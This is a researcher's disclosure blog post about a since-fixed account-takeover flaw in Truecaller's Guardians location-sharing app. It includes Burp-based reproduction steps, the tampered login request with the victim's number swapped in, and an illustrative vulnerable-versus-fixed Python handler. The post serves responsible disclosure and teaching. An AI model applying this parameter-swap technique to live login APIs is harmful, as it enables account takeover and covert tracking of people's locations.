How we could have tracked anyone's live location using Truecaller's "Guardians" app
Security Research

Anand Prakash
March 25, 2021

Truecaller recently launched a new application named "Guardians," a safety app that lets users share their live location permanently with Guardians they have chosen from their contacts.
If you use this application, your selected contacts can track your location in real time. You can also choose to accept help from "Community Guardians," who receive your location after you tap the emergency button. For Truecaller users, the sign-in process is a single tap.

Summary:
It was possible for an attacker to log in to a victim's "Guardians" account using nothing more than the victim's phone number. Once logged in, the attacker could track the locations of all of the victim's family members. The application also leaked the victim's account details such as date of birth, profile picture, and emergency contact details, and it allowed the attacker to add more family members to the account once it was taken over. Truecaller was quick to fix the reported vulnerability, within a few hours.


Vulnerability Details:
This vulnerability existed in the "Log in with Truecaller" option of the "Guardians" application. By intercepting the login API request, an attacker could change the "number" parameter to the victim's number, keep every other parameter (including their own Truecaller signature and payload) as it was, and forward the request. The API responded with a valid access token for the victim in the response headers: the server verified the attacker's Truecaller proof but issued the token for the phone number supplied in the request body rather than for the number that proof actually vouched for.
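To make the failure concrete, the following is an added example (not Guardians' or Truecaller's code; the HMAC-based proof, the key, the token format and all function names are stand-ins I assume for illustration) of a login handler that verifies the Truecaller proof but mints a token for the client-supplied "phoneNumber", beside the hardened handler that binds the token to the number inside the verified payload and rejects a mismatch.

```python
import hashlib, hmac, json, secrets

# Stand-in for the Truecaller-issued proof: an HMAC over a small profile payload.
# The real scheme is a Truecaller signature; the key, the token format and every
# function name below are assumptions made for this illustration.
TRUECALLER_KEY = b"stand-in-truecaller-signing-key"
ISSUED_TOKENS = {}  # token -> phone number the token grants access to

def tc_sign(payload):
    """Simulate Truecaller vouching for a number: returns (payload_json, signature)."""
    raw = json.dumps(payload, sort_keys=True)
    return raw, hmac.new(TRUECALLER_KEY, raw.encode(), hashlib.sha256).hexdigest()

def tc_verify(raw_payload, sig):
    """Return the verified payload dict, or None when the signature does not match."""
    expected = hmac.new(TRUECALLER_KEY, raw_payload.encode(), hashlib.sha256).hexdigest()
    return json.loads(raw_payload) if hmac.compare_digest(expected, sig) else None

def login_vulnerable(req):
    """Mirrors the reported flaw: the Truecaller proof is checked, but the token is
    minted for whatever phoneNumber.number the client put in the body."""
    v = req["userVerificationInput"]
    if tc_verify(v["tcUserPayload"], v["tcUserSignature"]) is None:
        return None
    token = secrets.token_urlsafe(24)
    ISSUED_TOKENS[token] = req["phoneNumber"]["number"]  # client-controlled value
    return token

def login_fixed(req):
    """Hardened: identity comes from the verified payload, and a body number that
    disagrees with it is rejected rather than trusted."""
    v = req["userVerificationInput"]
    verified = tc_verify(v["tcUserPayload"], v["tcUserSignature"])
    if verified is None or verified["number"] != req["phoneNumber"]["number"]:
        return None
    token = secrets.token_urlsafe(24)
    ISSUED_TOKENS[token] = verified["number"]  # bound to the signed identity
    return token

def build_request(signed_for, claimed):
    """Constructed /v0/user body in the shape shown in the write-up."""
    raw, sig = tc_sign({"countryCode": "IN", "number": signed_for})
    return {"userVerificationInput": {"nonTCUserToken": "", "tcUserSignature": sig,
                                      "tcUserPayload": raw},
            "phoneNumber": {"countryCode": "IN", "number": claimed},
            "tcUser": True, "ios": True}
```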

Steps to Reproduce:
1) Install Truecaller's Guardians application on your phone.
2) Start intercepting the application's traffic with Burp Suite Proxy.
3) Tap the "Login with Truecaller" option, change the "number" parameter to the victim's phone number, and don't modify any other values in the request.
4) You will be logged in to the victim's account.


Vulnerable Request:


POST /v0/user HTTP/1.1
Host: api.getguardians.com
Content-Type: application/json
Accept: */*
Connection: close
Content-Length: 656
User-Agent: Guardians/1.1.3 (com.truesoftware.Guardians; build:1.1.3; iOS 14.4.0) Alamofire/5.4.1
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Authorization: Bearer aQ4AOdxwPPWJM06sICQMQRWlANOC1crV
Accept-Encoding: gzip, deflate

{
  "userVerificationInput": {
    "nonTCUserToken": "",
    "tcUserSignature": "[attacker's Signature]",
    "tcUserPayload": "[Attacker's Payload]"
  },
  "phoneNumber": {
    "countryCode": "IN",
    "number": "[victim'sPhoneNumber]"
  },
  "tcUser": true,
  "ios": true
}


Response:


HTTP/1.1 200 OK
x-auth-token: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOxxxxxx [Victim's Authorisation token]
content-type: application/json
Content-Length: 65
x-envoy-upstream-service-time: 5
server: istio-envoy
Via: 1.1 google
Alt-Svc: clear
Connection: close

{
  "userID": "xx-xxx-xxx-xxxx-xxx",
  "existing": true
}


Timelines:
March 4th, 2021 1:57 PM IST - Reported to Truecaller's Responsible Disclosure Program.
March 4th, 2021 3:24 PM IST - Issue acknowledged by Truecaller.
March 5th, 2021 8:46 PM IST - Emailed Truecaller for an update.
March 6th, 2021 12:04 PM IST - Truecaller confirms that the team has fixed the issue.


This type of vulnerability is categorized as "Insecure Direct Object Reference". Companies tend to miss such fundamental issues even after rigorous security assessments. The repercussions of such problems are enormous: they impact customers' privacy and lead to revenue losses for the companies involved.
Read more: https://www.pingsafe.ai

ABOUT THE AUTHOR
Anand Prakash

Anand Prakash is a prolific security researcher who is famous for finding bugs in some of the world’s most popular apps and websites. He thrives off of “bug bounties” — large cash prizes he earns from companies in exchange for successfully hacking their systems and showing them their security flaws. Anand is supremely good at what he does, having discovered vulnerabilities at companies like Facebook, Twitter, and Uber. For the past 5 years, Facebook has ranked Anand as one of their top bounty hunters. And on Twitter’s bounty program, he’s ranked #3 world-wide. Anand’s reputation as a hacker has led to him being featured in last year’s Forbes “30 under 30” for enterprise technology in Asia. And a major Indian news website declared Anand “one of India’s best known white hat hackers.”
